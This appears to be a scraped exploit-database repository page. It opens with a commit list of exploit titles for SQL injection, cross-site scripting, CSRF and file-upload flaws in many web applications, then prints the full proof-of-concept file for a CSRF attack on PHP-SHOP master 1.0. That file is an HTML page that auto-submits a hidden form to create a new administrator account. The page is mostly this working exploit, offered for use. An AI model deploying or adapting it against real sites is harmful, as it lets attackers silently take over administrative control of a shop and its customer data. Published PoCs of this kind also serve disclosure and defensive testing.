fa0fe9b6cf
3 changes to exploits/shellcodes MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection HaPe PKH 1.1 - 'id' SQL Injection LUYA CMS 1.0.12 - Cross-Site Scripting Phoenix Contact WebVisit 2985725 - Authentication Bypass HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin) CAMALEON CMS 2.4 - Cross-Site Scripting HaPe PKH 1.1 - Arbitrary File Upload SugarCRM 6.5.26 - Cross-Site Scripting HaPe PKH 1.1 - 'id' SQL Injection LUYA CMS 1.0.12 - Cross-Site Scripting Phoenix Contact WebVisit 2985725 - Authentication Bypass HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin) CAMALEON CMS 2.4 - Cross-Site Scripting HaPe PKH 1.1 - Arbitrary File Upload SugarCRM 6.5.26 - Cross-Site Scripting Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin) AlchemyCMS 4.1 - Cross-Site Scripting Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin) AlchemyCMS 4.1 - Cross-Site Scripting College Notes Management System 1.0 - 'user' SQL Injection Academic Timetable Final Build 7.0 - Information Disclosure KORA 2.7.0 - 'cid' SQL Injection HotelDruid 2.2.4 - 'anno' SQL Injection Navigate CMS 2.8.5 - Arbitrary File Download Library CMS 2.1.1 - Cross-Site Scripting Kados R10 GreenBee - 'release_id' SQL Injection Vishesh Auto Index 3.1 - 'fid' SQL Injection WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection MV Video Sharing Software 1.2 - 'searchname' SQL Injection GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection Academic Timetable Final Build 7.0 - Information Disclosure KORA 2.7.0 - 'cid' SQL Injection HotelDruid 2.2.4 - 'anno' SQL Injection Navigate CMS 2.8.5 - Arbitrary File Download Library CMS 2.1.1 - Cross-Site Scripting Kados R10 GreenBee - 'release_id' SQL Injection Vishesh Auto Index 3.1 - 'fid' SQL Injection WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection MV Video Sharing Software 1.2 - 'searchname' SQL Injection GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection BigTree CMS 4.2.23 - Cross-Site Scripting Learning with Texts 1.6.2 - 'start' SQL Injection PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add admin) OwnTicket 1.0 - 'TicketID' SQL Injection
32 lines
No EOL
916 B
Text
32 lines
No EOL
916 B
Text
# Exploit Title: PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add admin)
|
|
# Exploit Author : Alireza Norkazemi
|
|
# Date: 2018-10-15
|
|
# Vendor Homepage : https://github.com/joeyrush/PHP-SHOP
|
|
# Software link: https://github.com/joeyrush/PHP-SHOP/archive/master.zip
|
|
# Version: 1.0
|
|
# Tested on: Windows 10
|
|
# CVE: N/A
|
|
|
|
# Proof of concept:
|
|
# Exploit:
|
|
|
|
<html>
|
|
<head>
|
|
<meta charset="UTF-8">
|
|
<title>POC</title>
|
|
</head>
|
|
<body>
|
|
<form action="http://127.0.0.1/clone/SHOP-PHP/admin/users.php?add=1"
|
|
method="post">
|
|
<input type="hidden" name="name" value="TEST">
|
|
<input type="hidden" name="email" value="TEST2">
|
|
<input type="hidden" name="password" value="T3ST123">
|
|
<input type="hidden" name="confirm" value="set">
|
|
<select name="permissions"><option value="admin,editor"></option></select>
|
|
<input type="submit" value="Add User">
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html> |